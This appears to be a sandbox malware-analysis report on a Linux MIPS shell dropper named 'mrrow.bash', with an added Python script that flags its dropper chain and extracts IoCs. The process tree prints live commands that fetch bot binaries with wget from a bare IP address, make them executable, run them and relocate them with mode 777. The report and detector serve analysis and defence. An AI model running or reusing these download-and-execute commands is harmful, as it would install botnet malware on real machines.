Resubmissions

  • 09-08-2022 19:31  220809-x8ezrafabp  (score 5)
  • 09-08-2022 19:22  220809-x28cqaehdq  (score 5)
  • 09-08-2022 19:21  220809-x2ny3sgec6  (score 5)

Analysis

  • max time network
    4s
  • platform
    linux_mips
  • resource
    debian9-mipsbe-en-20211208
  • resource tags

    arch:mips
    image:debian9-mipsbe-en-20211208
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    09-08-2022 19:21

General

  • Target

    mrrow.bash

  • Size

    2KB

  • MD5

    9486bdff70b6ec6243b012a91e90c21e

  • SHA1

    2364e70ee0d49e4e641fa7428958f5907a8c26a3

  • SHA256

    2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826

  • SHA512

    e64e2324c403d967d3d04140bb0eba159e57b83db09fdd50e882a8edc595211837505c86c1d44a65d11b9c3a34c0d02496b3c06f264e1175e248397e9716b4bd

Score
5/10

Malware Config

Signatures

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/mrrow.bash
    /tmp/mrrow.bash
    1⤵
    • Writes file to tmp directory
    PID:320
    • /usr/bin/wget
      wget http://109.206.241.211/bins/bot.mips
      2⤵
      PID:321
    • /bin/cat
      cat bot.mips
      2⤵
      PID:323
    • /bin/chmod
      chmod +x bot.mips fuwwyowo mrrow.bash systemd-private-a274da174cb44ad4b78e55297a3aefdc-systemd-timesyncd.service-qJHWtF
      2⤵
      PID:324
    • ./fuwwyowo
      ./fuwwyowo ssh
      2⤵
      PID:325
    • /usr/bin/wget
      wget http://109.206.241.211/bins/bot.mpsl
      2⤵
      PID:327
  • /bin/sh
    sh -c "mkdir /3hf3qkb7nn/ && >/3hf3qkb7nn/3hf3qkb7nn && cd /3hf3qkb7nn/ >/dev/null"
    1⤵
    PID:329
    • /bin/mkdir
      mkdir /3hf3qkb7nn/
      2⤵
      • Reads runtime system information
      PID:330
  • /bin/sh
    sh -c "mv /tmp/fuwwyowo /3hf3qkb7nn/3hf3qkb7nn && chmod 777 /3hf3qkb7nn/3hf3qkb7nn >/dev/null"
    1⤵
    PID:331
    • /bin/mv
      mv /tmp/fuwwyowo /3hf3qkb7nn/3hf3qkb7nn
      2⤵
      • Reads runtime system information
      PID:332
    • /bin/chmod
      chmod 777 /3hf3qkb7nn/3hf3qkb7nn
      2⤵
      PID:333
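The process tree above is a classic shell dropper sequence: fetch a payload from a bare-IP URL, mark it executable, run it, then relocate it into a freshly created random-named top-level directory with mode 777. As an added example (editor's code, not part of the Triage report and not the sample's code), the script below replays the command lines transcribed from that tree through a few hand-written heuristics and extracts the network IoCs. The rule names, the "three stages seen" threshold for a dropper-chain verdict, and the random-directory-name heuristic are the editor's own assumptions, not Triage signatures; the tree tuples are copied from the report.

```python
"""Editor-written triage helper: score a Linux process tree for dropper-style
behaviour and pull out network IoCs. Rules are heuristics, not Triage's."""
import re
import shlex
from dataclasses import dataclass

# (pid, depth, command line) transcribed from the report's Processes section.
SAMPLE_TREE = [
    (320, 1, "/tmp/mrrow.bash"),
    (321, 2, "wget http://109.206.241.211/bins/bot.mips"),
    (323, 2, "cat bot.mips"),
    (324, 2, "chmod +x bot.mips fuwwyowo mrrow.bash "
             "systemd-private-a274da174cb44ad4b78e55297a3aefdc-systemd-timesyncd.service-qJHWtF"),
    (325, 2, "./fuwwyowo ssh"),
    (327, 2, "wget http://109.206.241.211/bins/bot.mpsl"),
    (329, 1, 'sh -c "mkdir /3hf3qkb7nn/ && >/3hf3qkb7nn/3hf3qkb7nn && cd /3hf3qkb7nn/ >/dev/null"'),
    (330, 2, "mkdir /3hf3qkb7nn/"),
    (331, 1, 'sh -c "mv /tmp/fuwwyowo /3hf3qkb7nn/3hf3qkb7nn && chmod 777 /3hf3qkb7nn/3hf3qkb7nn >/dev/null"'),
    (332, 2, "mv /tmp/fuwwyowo /3hf3qkb7nn/3hf3qkb7nn"),
    (333, 2, "chmod 777 /3hf3qkb7nn/3hf3qkb7nn"),
]

IPV4_URL = re.compile(r"\bhttps?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/\S*")
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
SHELLS = {"sh", "bash", "dash", "ash"}
# Rules that together indicate a download-execute-relocate chain (assumed threshold: 3).
CHAIN_RULES = {"download_from_bare_ip", "chmod_exec", "chmod_world_writable_exec",
               "exec_from_tmp_or_cwd", "relocate_from_tmp"}


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def _argv(cmdline):
    try:
        return shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: fall back to whitespace split
        return cmdline.split()


def _basename(path):
    return path.rsplit("/", 1)[-1]


def _subcommands(cmdline):
    """Yield argv lists; a `sh -c "a && b"` wrapper is expanded into a and b."""
    argv = _argv(cmdline)
    if argv and _basename(argv[0]) in SHELLS and "-c" in argv[:-1]:
        script = argv[argv.index("-c") + 1]
        for part in re.split(r"\s*(?:&&|\|\||;|\|)\s*", script):
            yield _argv(part)
    else:
        yield argv


def _grants_exec(mode):
    """True if a chmod mode string adds an execute bit (octal or symbolic)."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "x" in mode and "-x" not in mode


def _random_root_dir(path):
    """Single top-level component, 8+ alphanumerics mixing letters and digits."""
    m = re.fullmatch(r"/([A-Za-z0-9]{8,})/?", path)
    return bool(m) and any(c.isdigit() for c in m.group(1)) and any(c.isalpha() for c in m.group(1))


def analyze(tree):
    findings = []
    for pid, _depth, cmdline in tree:
        for argv in _subcommands(cmdline):
            if not argv:
                continue
            prog = _basename(argv[0])
            if prog in DOWNLOADERS:
                for m in IPV4_URL.finditer(" ".join(argv)):
                    findings.append(Finding(pid, "download_from_bare_ip", m.group(0)))
            if argv[0].startswith(("/tmp/", "./")):
                findings.append(Finding(pid, "exec_from_tmp_or_cwd", argv[0]))
            if prog == "chmod" and len(argv) >= 3 and _grants_exec(argv[1]):
                targets = [t for t in argv[2:] if not t.startswith((">", "<"))]
                rule = "chmod_world_writable_exec" if argv[1] == "777" else "chmod_exec"
                findings.append(Finding(pid, rule, " ".join(targets)))
            if prog == "mkdir":
                for target in argv[1:]:
                    if _random_root_dir(target):
                        findings.append(Finding(pid, "random_root_dir", target))
            if prog == "mv" and len(argv) >= 3 and argv[1].startswith("/tmp/"):
                findings.append(Finding(pid, "relocate_from_tmp", f"{argv[1]} -> {argv[2]}"))
    return findings


def network_iocs(findings):
    urls = sorted({f.detail for f in findings if f.rule == "download_from_bare_ip"})
    hosts = sorted({IPV4_URL.match(u).group(1) for u in urls})
    return urls, hosts


def verdict(findings):
    hit = {f.rule for f in findings} & CHAIN_RULES
    return "dropper-chain" if len(hit) >= 3 else ("suspicious" if hit else "clean")


if __name__ == "__main__":
    found = analyze(SAMPLE_TREE)
    for f in found:
        print(f"pid {f.pid:>4}  {f.rule:<26} {f.detail}")
    print("network IoCs:", network_iocs(found))
    print("verdict:", verdict(found))
```

Note that `sh -c` wrappers are expanded so a rule still fires when the sandbox did not record the child process separately; the `>/3hf3qkb7nn/3hf3qkb7nn` redirect that pre-creates the destination file is deliberately not matched, since a bare redirect carries no program name to key a rule on.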

Network

MITRE ATT&CK Matrix
